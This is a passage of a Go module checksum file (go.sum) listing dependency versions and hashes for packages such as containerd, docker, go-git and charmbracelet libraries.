h1:exZ0C/1emQJAw5tHOaUDyY1ycttqBAPcxuzf7QbY6ec= github.com/Microsoft/go-winio v0.5.2/go.mod h1:WpS1mjBmmwHBEWmogvA2mj8546UReBk4v8QkMxJ6pZY= github.com/Microsoft/go-winio v0.6.2 h1:F2VQgta7ecxGYO8k3ZZz3RS8fVIXVxONVUPlNERoyfY= github.com/Microsoft/go-winio v0.6.2/go.mod h1:yd8OoFMLzJbo9gZq8j5qaps8bJ9aShtEA8Ipt1oGCvU= github.com/Microsoft/hcsshim v0.13.0 h1:/BcXOiS6Qi7N9XqUcv27vkIuVOkBEcWstd2pMlWSeaA= github.com/Microsoft/hcsshim v0.13.0/go.mod h1:9KWJ/8DgU+QzYGupX4tzMhRQE8h6w90lH6HAaclpEok= github.com/ProtonMail/go-crypto v1.3.0 h1:ILq8+Sf5If5DCpHQp4PbZdS1J7HDFRXz/+xKBiRGFrw= github.com/ProtonMail/go-crypto v1.3.0/go.mod h1:9whxjD8Rbs29b4XWbB8irEcE8KHMqaR2e7GWU1R+/PE= github.com/aead/serpent v0.0.0-20160714141033-fba169763ea6 h1:5L8Mj9Co9sJVgW3TpYk2gxGJnDjsYuboNTcRmbtGKGs= github.com/aead/serpent v0.0.0-20160714141033-fba169763ea6/go.mod h1:3HgLJ9d18kXMLQlJvIY3+FszZYMxCz8WfE2MQ7hDY0w= github.com/agext/levenshtein v1.2.3 h1:YB2fHEn0UJagG8T1rrWknE3ZQzWM06O8AMAatNn7lmo= github.com/agext/levenshtein v1.2.3/go.mod h1:JEDfjyjHDjOF/1e4FlBE/PkbqA9OfWu2ki2W0IB5558= github.com/alecthomas/assert v1.0.0 h1:3XmGh/PSuLzDbK3W2gUbRXwgW5lqPkuqvRgeQ30FI5o= github.com/alecthomas/assert v1.0.0/go.mod h1:va/d2JC+M7F6s+80kl/R3G7FUiW6JzUO+hPhLyJ36ZY= github.com/alecthomas/assert/v2 v2.11.0 h1:2Q9r3ki8+JYXvGsDyBXwH3LcJ+WK5D0gc5E8vS6K3D0= github.com/alecthomas/assert/v2 v2.11.0/go.mod h1:Bze95FyfUr7x34QZrjL+XP+0qgp/zg8yS+TtBj1WA3k= github.com/alecthomas/chroma/v2 v2.19.0 h1:Im+SLRgT8maArxv81mULDWN8oKxkzboH07CHesxElq4= github.com/alecthomas/chroma/v2 v2.19.0/go.mod h1:RVX6AvYm4VfYe/zsk7mjHueLDZor3aWCNE14TFlepBk= github.com/alecthomas/colour v0.1.0 h1:nOE9rJm6dsZ66RGWYSFrXw461ZIt9A6+nHgL7FRrDUk= github.com/alecthomas/colour v0.1.0/go.mod h1:QO9JBoKquHd+jz9nshCh40fOfO+JzsoXy8qTHF68zU0= github.com/alecthomas/repr v0.4.0 h1:GhI2A8MACjfegCPVq9f1FLvIBS+DrQ2KQBFZP1iFzXc= github.com/alecthomas/repr v0.4.0/go.mod h1:Fr0507jx4eOXV7AlPV6AVZLYrLIuIeSOWtW57eE/O/4= github.com/anchore/go-lzo v0.1.0 
h1:NgAacnzqPeGH49Ky19QKLBZEuFRqtTG9cdaucc3Vncs= github.com/anchore/go-lzo v0.1.0/go.mod h1:3kLx0bve2oN1iDwgM1U5zGku1Tfbdb0No5qp1eL1fIk= github.com/anchore/go-struct-converter v0.0.0-20221118182256-c68fdcfa2092/go.mod h1:rYqSE9HbjzpHTI74vwPvae4ZVYZd1lue2ta6xHPdblA= github.com/anchore/go-struct-converter v0.0.0-20250211213226-cce56d595160 h1:r8/1fxpbDMlQO6GgQiud1uL5eAu3p/NVUmfNx95/KY8= github.com/anchore/go-struct-converter v0.0.0-20250211213226-cce56d595160/go.mod h1:rYqSE9HbjzpHTI74vwPvae4ZVYZd1lue2ta6xHPdblA= github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be h1:9AeTilPcZAjCFIImctFaOjnTIavg87rW78vTPkQqLI8= github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be/go.mod h1:ySMOLuWl6zY27l47sB3qLNK6tF2fkHG55UZxx8oIVo4= github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio= github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5/go.mod h1:wHh0iHkYZB8zMSxRWpUBQtwG5a7fFgvEO+odwuTv2gs= github.com/atotto/clipboard v0.1.4 h1:EH0zSVneZPSuFR11BlR9YppQTVDbh5+16AmcJi4g1z4= github.com/atotto/clipboard v0.1.4/go.mod h1:ZY9tmq7sm5xIbd9bOK4onWV4S6X0u6GY7Vn0Yu86PYI= github.com/aymanbagabas/go-udiff v0.4.1 h1:OEIrQ8maEeDBXQDoGCbbTTXYJMYRCRO1fnodZ12Gv5o= github.com/aymanbagabas/go-udiff v0.4.1/go.mod h1:0L9PGwj20lrtmEMeyw4WKJ/TMyDtvAoK9bf2u/mNo3w= github.com/aymerick/douceur v0.2.0 h1:Mv+mAeH1Q+n9Fr+oyamOlAkUNPWPlA8PPGR0QAaYuPk= github.com/aymerick/douceur v0.2.0/go.mod h1:wlT5vV2O3h55X9m7iVYN0TBM0NH/MmbLnd30/FjWUq4= github.com/bazelbuild/buildtools v0.0.0-20250826111327-4006b543a694 h1:LiKs9FsSfMx3NomNclXYkv9enY77oft5Mc/vX/AKHgI= github.com/bazelbuild/buildtools v0.0.0-20250826111327-4006b543a694/go.mod h1:PLNUetjLa77TCCziPsz0EI8a6CUxgC+1jgmWv0H25tg= github.com/bradleyjkemp/cupaloy/v2 v2.8.0 h1:any4BmKE+jGIaMpnU8YgH/I2LPiLBufr6oMMlVBbn9M= github.com/bradleyjkemp/cupaloy/v2 v2.8.0/go.mod h1:bm7JXdkRd4BHJk9HpwqAI8BoAY1lps46Enkdqw6aRX0= github.com/cenkalti/backoff/v4 v4.3.0 
h1:MyRJ/UdXutAwSAT+s3wNd7MfTIcy71VQueUuFK343L8= github.com/cenkalti/backoff/v4 v4.3.0/go.mod h1:Y3VNntkOUPxTVeUxJ/G5vcM//AlwfmyYozVcomhLiZE= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/colorprofile v0.4.2 h1:BdSNuMjRbotnxHSfxy+PCSa4xAmz7szw70ktAtWRYrY= github.com/charmbracelet/colorprofile v0.4.2/go.mod h1:0rTi81QpwDElInthtrQ6Ni7cG0sDtwAd4C4le060fT8= github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8 h1:eyFRbAmexyt43hVfeyBofiGSEmJ7krjLOYt/9CF5NKA= github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8/go.mod h1:SQpCTRNBtzJkwku5ye4S3HEuthAlGy2n9VXZnWkEW98= github.com/charmbracelet/x/ansi v0.11.6 h1:GhV21SiDz/45W9AnV2R61xZMRri5NlLnl6CVF7ihZW8= github.com/charmbracelet/x/ansi v0.11.6/go.mod h1:2JNYLgQUsyqaiLovhU2Rv/pb8r6ydXKS3NIttu3VGZQ= github.com/charmbracelet/x/exp/golden v0.0.0-20250806222409-83e3a29d542f h1:pk6gmGpCE7F3FcjaOEKYriCvpmIN4+6OS/RD0vm4uIA= github.com/charmbracelet/x/exp/golden v0.0.0-20250806222409-83e3a29d542f/go.mod h1:IfZAMTHB6XkZSeXUqriemErjAWCCzT0LwjKFYCZyw0I= github.com/charmbracelet/x/exp/slice v0.0.0-20250711012602-b1f986320f7e h1:uuxP7L/srRKTMRPUCZsARYBr9x/bULlN6Sc28aUAIJU= github.com/charmbracelet/x/exp/slice v0.0.0-20250711012602-b1f986320f7e/go.mod h1:vI5nDVMWi6veaYH+0Fmvpbe/+cv/iJfMntdh+N0+Tms= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= github.com/charmbracelet/x/termios v0.1.1 h1:o3Q2bT8eqzGnGPOYheoYS8eEleT5ZVNYNy8JawjaNZY= github.com/charmbracelet/x/termios v0.1.1/go.mod h1:rB7fnv1TgOPOyyKRJ9o+AsTU/vK5WHJ2ivHeut/Pcwo= github.com/charmbracelet/x/windows v0.2.2 
h1:IofanmuvaxnKHuV04sC0eBy/smG6kIKrWG2/jYn2GuM= github.com/charmbracelet/x/windows v0.2.2/go.mod h1:/8XtdKZzedat74NQFn0NGlGL4soHB0YQZrETF96h75k= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.11.0 h1:lBc6kY44VFw+TDx4I8opi/EtL9m20WSEFgwIwO+UVM8= github.com/clipperhouse/displaywidth v0.11.0/go.mod h1:bkrFNkf81G8HyVqmKGxsPufD3JhNl3dSqnGhOoSD/o0= github.com/clipperhouse/uax29/v2 v2.7.0 h1:+gs4oBZ2gPfVrKPthwbMzWZDaAFPGYK72F0NJv2v7Vk= github.com/clipperhouse/uax29/v2 v2.7.0/go.mod h1:EFJ2TJMRUaplDxHKj1qAEhCtQPW2tJSwu5BF98AuoVM= github.com/cloudflare/circl v1.6.3 h1:9GPOhQGF9MCYUeXyMYlqTR6a5gTrgR/fBLXvUgtVcg8= github.com/cloudflare/circl v1.6.3/go.mod h1:2eXP6Qfat4O/Yhh8BznvKnJ+uzEoTQ6jVKJRn81BiS4= github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/compose-spec/compose-go/v2 v2.8.1 h1:27O4dzyhiS/UEUKp1zHOHCBWD1WbxGsYGMNNaSejTk4= github.com/compose-spec/compose-go/v2 v2.8.1/go.mod h1:veko/VB7URrg/tKz3vmIAQDaz+CGiXH8vZsW79NmAww= github.com/containerd/cgroups/v3 v3.0.5 h1:44na7Ud+VwyE7LIoJ8JTNQOa549a8543BmzaJHo6Bzo= github.com/containerd/cgroups/v3 v3.0.5/go.mod h1:SA5DLYnXO8pTGYiAHXz94qvLQTKfVM5GEVisn4jpins= github.com/containerd/containerd v1.7.29 h1:90fWABQsaN9mJhGkoVnuzEY+o1XDPbg9BTC9QTAHnuE= github.com/containerd/containerd v1.7.29/go.mod h1:azUkWcOvHrWvaiUjSQH0fjzuHIwSPg1WL5PshGP4Szs= github.com/containerd/containerd/api v1.9.0 h1:HZ/licowTRazus+wt9fM6r/9BQO7S0vD5lMcWspGIg0= github.com/containerd/containerd/api v1.9.0/go.mod h1:GhghKFmTR3hNtyznBoQ0EMWr9ju5AqHjcZPsSpTKutI= github.com/containerd/continuity v0.4.5 h1:ZRoN1sXq9u7V6QoHMcVWGhOwDFqZ4B9i5H6un1Wh0x4= github.com/containerd/continuity v0.4.5/go.mod h1:/lNJvtJKUQStBzpVQ1+rasXO1LAWtUQssk28EZvJ3nE= github.com/containerd/errdefs v1.0.0 h1:tg5yIfIlQIrxYtu9ajqY42W3lpS19XqdxRQeEwYG8PI= github.com/containerd/errdefs v1.0.0/go.mod 
h1:+YBYIdtsnF4Iw6nWZhJcqGSg/dwvV7tyJ/kCkyJ2k+M= github.com/containerd/errdefs/pkg v0.3.0 h1:9IKJ06FvyNlexW690DXuQNx2KA2cUJXx151Xdx3ZPPE= github.com/containerd/errdefs/pkg v0.3.0/go.mod h1:NJw6s9HwNuRhnjJhM7pylWwMyAkmCQvQ4GpJHEqRLVk= github.com/containerd/fifo v1.1.0 h1:4I2mbh5stb1u6ycIABlBw9zgtlK8viPI9QkQNRQEEmY= github.com/containerd/fifo v1.1.0/go.mod h1:bmC4NWMbXlt2EZ0Hc7Fx7QzTFxgPID13eH0Qu+MAb2o= github.com/containerd/log v0.1.0 h1:TCJt7ioM2cr/tfR8GPbGf9/VRAX8D2B4PjzCpfX540I= github.com/containerd/log v0.1.0/go.mod h1:VRRf09a7mHDIRezVKTRCrOq78v577GXq3bSa3EhrzVo= github.com/containerd/platforms v1.0.0-rc.1 h1:83KIq4yy1erSRgOVHNk1HYdPvzdJ5CnsWaRoJX4C41E= github.com/containerd/platforms v1.0.0-rc.1/go.mod h1:J71L7B+aiM5SdIEqmd9wp6THLVRzJGXfNuWCZCllLA4= github.com/containerd/stargz-snapshotter/estargz v0.16.3 h1:7evrXtoh1mSbGj/pfRccTampEyKpjpOnS3CyiV1Ebr8= github.com/containerd/stargz-snapshotter/estargz v0.16.3/go.mod h1:uyr4BfYfOj3G9WBVE8cOlQmXAbPN9VEQpBBeJIuOipU= github.com/containerd/ttrpc v1.2.7 h1:qIrroQvuOL9HQ1X6KHe2ohc7p+HP/0VE6XPU7elJRqQ= github.com/containerd/ttrpc v1.2.7/go.mod h1:YCXHsb32f+Sq5/72xHubdiJRQY9inL4a4ZQrAbN1q9o= github.com/containerd/typeurl/v2 v2.2.3 h1:yNA/94zxWdvYACdYO8zofhrTVuQY73fFU1y++dYSw40= github.com/containerd/typeurl/v2 v2.2.3/go.mod h1:95ljDnPfD3bAbDJRugOiShd/DlAAsxGtUBhJxIn7SCk= github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E= github.com/cyphar/filepath-securejoin v0.6.0 h1:BtGB77njd6SVO6VztOHfPxKitJvd/VPT+OFBFMOi1Is= github.com/cyphar/filepath-securejoin v0.6.0/go.mod h1:A8hd4EnAeyujCJRrICiOWqjS1AX0a9kM5XL+NwKoYSc= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM= github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod 
h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/deitch/magic v0.0.0-20240306090643-c67ab88f10cb h1:4W/2rQ3wzEimF5s+J6OY3ODiQtJZ5W1sForSgogVXkY= github.com/deitch/magic v0.0.0-20240306090643-c67ab88f10cb/go.mod h1:B3tI9iGHi4imdLi4Asdha1Sc6feLMTfPLXh9IUYmysk= github.com/diskfs/go-diskfs v1.7.0 h1:vonWmt5CMowXwUc79jWyGrf2DIMeoOjkLlMnQYGVOs8= github.com/diskfs/go-diskfs v1.7.0/go.mod h1:LhQyXqOugWFRahYUSw47NyZJPezFzB9UELwhpszLP/k= github.com/distribution/reference v0.6.0 h1:0IXCQ5g4/QMHHkarYzh5l+u8T3t73zM5QvfrDyIgxBk= github.com/distribution/reference v0.6.0/go.mod h1:BbU0aIcezP1/5jX/8MP0YiH4SdvB5Y4f/wlDRiLyi3E= github.com/djherbis/times v1.6.0 h1:w2ctJ92J8fBvWPxugmXIv7Nz7Q3iDMKNx9v5ocVH20c= github.com/djherbis/times v1.6.0/go.mod h1:gOHeRAz2h+VJNZ5Gmc/o7iD9k4wW7NMVqieYCY99oc0= github.com/dlclark/regexp2 v1.11.5 h1:Q/sSnsKerHeCkc/jSTNq1oCm7KiVgUMZRDUoRu0JQZQ= github.com/dlclark/regexp2 v1.11.5/go.mod h1:DHkYz0B9wPfa6wondMfaivmHpzrQ3v9q8cnmRbL6yW8= github.com/docker/cli v29.2.0+incompatible h1:9oBd9+YM7rxjZLfyMGxjraKBKE4/nVyvVfN4qNl9XRM= github.com/docker/cli v29.2.0+incompatible/go.mod h1:JLrzqnKDaYBop7H2jaqPtU4hHvMKP+vjCwu2uszcLI8= github.com/docker/distribution v2.8.3+incompatible h1:AtKxIZ36LoNK51+Z6RpzLpddBirtxJnzDrHLEKxTAYk= github.com/docker/distribution v2.8.3+incompatible/go.mod h1:J2gT2udsDAN96Uj4KfcMRqY0/ypR+oyYUYmja8H+y+w= github.com/docker/docker v28.3.3+incompatible h1:Dypm25kh4rmk49v1eiVbsAtpAsYURjYkaKubwuBdxEI= github.com/docker/docker v28.3.3+incompatible/go.mod h1:eEKB0N0r5NX/I1kEveEz05bcu8tLC/8azJZsviup8Sk= github.com/docker/docker-credential-helpers v0.9.3 h1:gAm/VtF9wgqJMoxzT3Gj5p4AqIjCBS4wrsOh9yRqcz8= github.com/docker/docker-credential-helpers v0.9.3/go.mod h1:x+4Gbw9aGmChi3qTLZj8Dfn0TD20M/fuWy0E5+WDeCo= github.com/docker/go-connections v0.5.0 h1:USnMq7hx7gwdVZq1L49hLXaFtUdTADjXGp+uj1Br63c= github.com/docker/go-connections v0.5.0/go.mod h1:ov60Kzw0kKElRwhNs9UlUHAE/F9Fe6GLaXnqyDdmEXc= github.com/docker/go-events 
v0.0.0-20250114142523-c867878c5e32 h1:EHZfspsnLAz8Hzccd67D5abwLiqoqym2jz/jOS39mCk= github.com/docker/go-events v0.0.0-20250114142523-c867878c5e32/go.mod h1:Uw6UezgYA44ePAFQYUehOuCzmy5zmg/+nl2ZfMWGkpA= github.com/docker/go-units v0.5.0 h1:69rxXcBk27SvSaaxTtLh/8llcHD8vYHT7WSdRZ/jvr4= github.com/docker/go-units v0.5.0/go.mod h1:fgPhTUdO+D/Jk86RDLlptpiXQzgHJF7gydDDbaIK4Dk= github.com/dsoprea/go-exfat v0.0.0-20190906070738-5e932fbdb589 h1:LzrKhEeL5tqo8i86+5a8JgL5cEJBRspVm4FsKRK/gxA= github.com/dsoprea/go-exfat v0.0.0-20190906070738-5e932fbdb589/go.mod h1:zs3tKt0dOHncKZ7QhimWwN9RP7f6W6CLdjRfscKvvcA= github.com/dsoprea/go-logging v0.0.0-20190624164917-c4f10aab7696/go.mod h1:Nm/x2ZUNRW6Fe5C3LxdY1PyZY5wmDv/s5dkPJ/VB3iA= github.com/dsoprea/go-logging v0.0.0-20200710184922-b02d349568dd h1:l+vLbuxptsC6VQyQsfD7NnEC8BZuFpz45PgY+pH8YTg= github.com/dsoprea/go-logging v0.0.0-20200710184922-b02d349568dd/go.mod h1:7I+3Pe2o/YSU88W0hWlm9S22W7XI1JFNJ86U0zPKMf8= github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY= github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto= github.com/edsrzf/mmap-go v1.1.0/go.mod h1:19H/e8pUPLicwkyNgOykDXkJ9F0MHE+Z52B8EIth78Q= github.com/edsrzf/mmap-go v1.2.0 h1:hXLYlkbaPzt1SaQk+anYwKSRNhufIDCchSPkUD6dD84= github.com/edsrzf/mmap-go v1.2.0/go.mod h1:19H/e8pUPLicwkyNgOykDXkJ9F0MHE+Z52B8EIth78Q= github.com/elazarl/goproxy v1.7.2 h1:Y2o6urb7Eule09PjlhQRGNsqRfPmYI3KKQLFpCAV3+o= github.com/elazarl/goproxy v1.7.2/go.mod h1:82vkLNir0ALaW14Rc399OTTjyNREgmdL2cVoIbS6XaE= github.com/elliotwutingfeng/asciiset v0.0.0-20230602022725-51bbb787efab h1:h1UgjJdAAhj+uPL68n7XASS6bU+07ZX1WJvVS2eyoeY= github.com/elliotwutingfeng/asciiset v0.0.0-20230602022725-51bbb787efab/go.mod h1:GLo/8fDswSAniFG+BFIaiSPcK610jyzgEhWYPQwuQdw= github.com/emirpasic/gods v1.18.1 h1:FXtiHYKDGKCW2KzwZKx0iC0PQmdlorYgdFG9jPXJ1Bc= 
github.com/emirpasic/gods v1.18.1/go.mod h1:8tpGGwCnJ5H4r6BWwaV6OrWmMoPhUl5jm/FMNAnJvWQ= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/erikvarga/go-rpmdb v0.0.0-20250523120114-a15a62cd4593 h1:cIQ/Ziclb/qreqg1nqGEtH4V9UJCTaNSKz9gBRaeZlA= github.com/erikvarga/go-rpmdb v0.0.0-20250523120114-a15a62cd4593/go.mod h1:MiEorPk0IChAoCwpg2FXyqVgbNvOlPWZAYHqqIoDNoY= github.com/felixge/httpsnoop v1.0.4 h1:NFTV2Zj1bL4mc9sqWACXbQFVBBg2W3GPvqp8/ESS2Wg= github.com/felixge/httpsnoop v1.0.4/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U= github.com/gkampitakis/ciinfo v0.3.2 h1:JcuOPk8ZU7nZQjdUhctuhQofk7BGHuIy0c9Ez8BNhXs= github.com/gkampitakis/ciinfo v0.3.2/go.mod h1:1NIwaOcFChN4fa/B0hEBdAb6npDlFL8Bwx4dfRLRqAo= github.com/gkampitakis/go-snaps v0.5.20 h1:FGKonEeQPJ12t7RQj6cTPa881fl5c8HYarMLv5vP7sg= github.com/gkampitakis/go-snaps v0.5.20/go.mod h1:gC3YqxQTPyIXvQrw/Vpt3a8VqR1MO8sVpZFWN4DGwNs= github.com/glebarez/go-sqlite v1.20.3 h1:89BkqGOXR9oRmG58ZrzgoY/Fhy5x0M+/WV48U5zVrZ4= github.com/glebarez/go-sqlite v1.20.3/go.mod h1:u3N6D/wftiAzIOJtZl6BmedqxmmkDfH3q+ihjqxC9u0= github.com/gliderlabs/ssh v0.3.8 h1:a4YXD1V7xMF9g5nTkdfnja3Sxy1PVDCj1Zg4Wb8vY6c= github.com/gliderlabs/ssh v0.3.8/go.mod h1:xYoytBv1sV0aL3CavoDuJIQNURXkkfPA/wxQ1pL1fAU= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= github.com/go-errors/errors v1.0.2 h1:xMxH9j2fNg/L4hLn/4y3M0IUsn0M6Wbu/Uh9QlOfBh4= github.com/go-errors/errors v1.0.2/go.mod h1:psDX2osz5VnTOnFWbDeWwS7yejl+uV3FEWEp4lssFEs= github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376 
h1:+zs/tPmkDkHx3U66DAb0lQFJrpS6731Oaa12ikc+DiI= github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376/go.mod h1:an3vInlBmSxCcxctByoQdvwPiA7DTK7jaaFDBTtu0ic= github.com/go-git/go-billy/v5 v5.8.0 h1:I8hjc3LbBlXTtVuFNJuwYuMiHvQJDq1AT6u4DwDzZG0= github.com/go-git/go-billy/v5 v5.8.0/go.mod h1:RpvI/rw4Vr5QA+Z60c6d6LXH0rYJo0uD5SqfmrrheCY= github.com/go-git/go-git-fixtures/v4 v4.3.2-0.20231010084843-55a94097c399 h1:eMje31YglSBqCdIqdhKBW8lokaMrL3uTkpGYlE2OOT4= github.com/go-git/go-git-fixtures/v4 v4.3.2-0.20231010084843-55a94097c399/go.mod h1:1OCfN199q1Jm3HZlxleg+Dw/mwps2Wbk9frAWm+4FII= github.com/go-git/go-git/v5 v5.17.0 h1:AbyI4xf+7DsjINHMu35quAh4wJygKBKBuXVjV/pxesM= github.com/go-git/go-git/v5 v5.17.0/go.mod h1:f82C4YiLx+Lhi8eHxltLeGC5uBTXSFa6PC5WW9o4SjI= github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= github.com/go-logr/logr v1.4.3 h1:CjnDlHq8ikf6E492q6eKboGOC0T8CDaOvkHCIg8idEI= github.com/go-logr/logr v1.4.3/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag= github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE= github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY= github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= github.com/go-restruct/restruct v0.0.0-20190418070341-acd4e4c2cb35/go.mod h1:e2k/t2/850rC773ilFYQSoqyJ78SpTx7gtFtOY6/AYA= github.com/go-restruct/restruct v1.2.0-alpha h1:2Lp474S/9660+SJjpVxoKuWX09JsXHSrdV7Nv3/gkvc= github.com/go-restruct/restruct v1.2.0-alpha/go.mod h1:KqrpKpn4M8OLznErihXTGLlsXFGeLxHUrLRRI/1YjGk= github.com/go-test/deep v1.0.8 h1:TDsG77qcSprGbC6vTN8OuXp5g+J+b5Pcguhf7Zt61VM= github.com/go-test/deep v1.0.8/go.mod h1:5C2ZWiW0ErCdrYzpqxLbTX7MG14M9iiw8DgHncVwcsE= github.com/go-viper/mapstructure/v2 v2.4.0 h1:EBsztssimR/CONLSZZ04E8qAkxNYq4Qp9LvH92wZUgs= github.com/go-viper/mapstructure/v2 v2.4.0/go.mod 
h1:oJDH3BJKyqBA2TXFhDsKDGDTlndYOZ6rGS0BRZIxGhM= github.com/gobwas/glob v0.2.3 h1:A4xDbljILXROh+kObIiy5kIaPYD8e96x1tgBhUI5J+Y= github.com/gobwas/glob v0.2.3/go.mod h1:d3Ez4x06l9bZtSvzIay5+Yzi0fmZzPgnTbPcKjJAkT8= github.com/goccy/go-yaml v1.19.2 h1:PmFC1S6h8ljIz6gMRBopkjP1TVT7xuwrButHID66PoM= github.com/goccy/go-yaml v1.19.2/go.mod h1:XBurs7gK8ATbW4ZPGKgcbrY1Br56PdM69F7LkFRi1kA= github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q= github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= github.com/gohugoio/hashstructure v0.5.0 h1:G2fjSBU36RdwEJBWJ+919ERvOVqAg9tfcYp47K9swqg= github.com/gohugoio/hashstructure v0.5.0/go.mod h1:Ser0TniXuu/eauYmrwM4o64EBvySxNzITEOLlm4igec= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 h1:f+oWsMOmNPc8JmEHVZIycC7hBoQxHH9pNKQORJNozsQ= github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8/go.mod h1:wcDNUvekVysuuOpQKo3191zZyTpiI6se1N1ULghS0sw= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= github.com/golang/protobuf 
